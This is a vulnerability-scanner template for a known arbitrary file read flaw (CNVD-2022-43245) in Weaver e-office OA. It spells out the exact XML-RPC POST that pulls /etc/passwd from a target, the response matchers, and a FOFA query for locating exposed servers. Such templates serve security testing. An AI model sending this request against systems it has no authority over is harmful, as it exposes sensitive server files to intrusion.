id: CNVD-2022-43245

info:
  name: Weaver OA XmlRpcServlet - Arbitary File Read
  author: SleepingBag945
  severity: high
  description: |
    e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  tags: cnvd,cnvd2022,weaver,e-office,oa,lfi

http:
  - raw:
      - |
        POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?><methodCall>
        <methodName>WorkflowService.getAttachment</methodName>
        <params><param><value><string>/etc/passwd</string>
        </value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<methodResponse><params><param><value><base64>"

      - type: word
        part: header
        words:
          - "text/xml"

      - type: status
        status:
          - 200

# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950